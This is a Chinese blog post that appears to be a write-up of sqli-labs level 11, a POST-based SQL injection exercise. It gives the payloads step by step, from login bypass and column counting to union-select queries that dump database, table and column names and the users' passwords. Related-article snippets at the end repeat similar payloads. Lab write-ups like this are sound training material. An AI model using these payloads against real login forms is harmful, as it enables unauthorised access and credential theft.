sql注入第11关

已于 2022-04-15 15:43:22 修改
阅读量3.9k 收藏
点赞数 2
分类专栏: OWASP 文章标签: sql 数据库 web安全
于 2022-03-14 17:55:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/123481617
版权

这关采用post的方式传参

定闭合符
使用’ or 1=1 # 回显正常
在这里插入图片描述

使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了)
在这里插入图片描述
实现原理

在这里插入图片描述
查询列数
admin’ order by 2 #
在这里插入图片描述

’ order by 3 #
在这里插入图片描述
所以有两列

找显示位
在这里插入图片描述
查数据库名

'union select 1,database()#

在这里插入图片描述
查表名

' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

在这里插入图片描述
查列名

' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
查列值

' union select 1,group_concat(username,0x3a,password) from users#

在这里插入图片描述

空白行
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十一节 HTTP头中的SQL注入-01
09-15
第十一节 HTTP头中的SQL注入-01
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
sqli-liabs学习SQL注入之旅(第十一~第二十
guanjian_ci的博客
04-22 2662
十一 可以看到十一和之前的十是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一存在弱口令,但我们要学习的是SQL注入) 账号:admin .
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1347
sqli-labs基础篇 第11~17
POST注入-SQL-labs(11)
weixin_51706044的博客
05-09 497
文章目录一、万能密码二、判断闭合符号三、查询列数四、找显示位 一、万能密码 对于万能密码的类型是根据SQL注入的情况而判断的,这里举例几个SQL注入中常见的几个类型: 1.xxx’ or 1 = 1#(最后的#可以换成-- (记住如果是-- 的最后有个空格)) 【这种是比较通用的】 2.xxx’ or ‘1’ = ‘1(最后可以加#或者加-- (记住如果是-- 的最后有个空格)) 3.xxx” or “1” = “1 4.xxx”) or (“1”) = (“1 其实对于表单注入:在用户名密码框当
sqli-labs靶场】第11
qq_61019688的博客
04-26 723
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
bwapp---sql注入第十一过程及分析
weixin_45821250的博客
12-07 247
报错没爆出来,但是插入的方式解决了。SQL Injection - Stored (Blog)
sqli-labs11(基于post提交的单引号闭合的字符型注入)通思路
最新发布
zyh1588的博客
11-06 440
小白回顾sqli-labs靶场第十一
web安全/渗透测试(十一):SQL注入
蓝泽兮的博客
04-14 517
一、SQL语句 增删改查 二、SQL注入的危害 1、提供对数据库敏感数据的访问 2、可以读取www文件夹外的本地文件 3、可以用admin登录并进一步对系统进行漏洞发掘 4、可以用来上传文件 三、发现SQL注入 1、使用‘and’,'order by'或“ '”在文本框和url注入 其中url形式为:http://baidu.com/page.php?something=som...
SQL注入详解 11-22
君莫hacker的博客
09-28 764
目录Less-11(POST传参,联合注入)Less-12(floor报错注入)Less-13(updatexml()报错注入)Less-14 Less-11(POST传参,联合注入) 第11总结: 第十一与前面的卡不太相同,这里采用了POST传参,我们需要借助浏览器插件或者抓包工具对其参数进行修改。用户名与密码均为admin,登录成功后会回显出用户名及密码,所以我们可以尝试在参数uname与参数passwd处尝试进行注入,经过判断,发现在参数uname处存在单引号字符型注入,并且有回显能判断出字段
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 ...SQL注入工具 SQL注入工具拓展篇 SQL 注入实战篇 - Thinkphp 框架 3.2.x sql 注入漏洞分析 ThinkPHP框架 < 5.0.16 sql注入漏洞分析 宽字节注入详解
第十一课-扫描、sql注入、上传绕过.ppt
02-22
网络攻防相,欢迎下载。网络攻防相,欢迎下载。网络攻防相,欢迎下载。网络攻防相,欢迎下载。网络攻防相,欢迎下载。
网站注入工具
12-17
6.加了一个补针,针对sql注入功能中的一个小BUG。 7.删除了很多没有用的代码,最大限度的优化程序启动速度。 8.更新部分在xpsp3下出错的几个小BUG(小问题小解决,这个错误仅针对部分优化过度的XPSP3系统)。 提记:很...
SQL SERVER 2000开发与管理应用实例
12-13
13.5.1 防止SQL注入式攻击 417 13.5.2 限制应用程序访问 418 13.5.3 不安全的扩展存储过程 419 第 14 章 系统表应用实例 423 14.1 系统对象概述 423 14.1.1 每个数据库中都存在的系统表 424 ...
sqli-labs-----第11
wyzhxhn的博客
11-09 1642
基于错误的POST型单引号字符型注入
基于Sql-Labs靶场的SQL注入-11~16
Joker
12-31 697
这里我讲述了POST提交方式的注入方法,用到的注入类型为联合注入、报错注入、布尔盲注三种。
SQL注入
热门推荐
m0_51457307的博客
11-08 1万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
sqli-labs第十一
小人物的博客
06-10 4364
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sql报错型注入-sqli-labs第11
weixin_46784800的博客
11-03 520
获取数据的操作 判断是否为字符型注入 passwd=1' or '1'='1 &uname=1' or '1'='1 输入post参数判断是否为字符型注入 判断数据库中含有多少列 通过查询语句: uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- - 可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。 判断界面输出与数据库的接口
dvwa sql注入盲注
10-09
Blind SQL注入是一种攻击技术,它利用应用程序对数据库的查询结果进行布尔判断来推断出数据的信息。在DVWA(Damn Vulnerable Web Application)中进行盲注的过程也类似。下面是一个简单的示例: 假设我们有一个登录...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值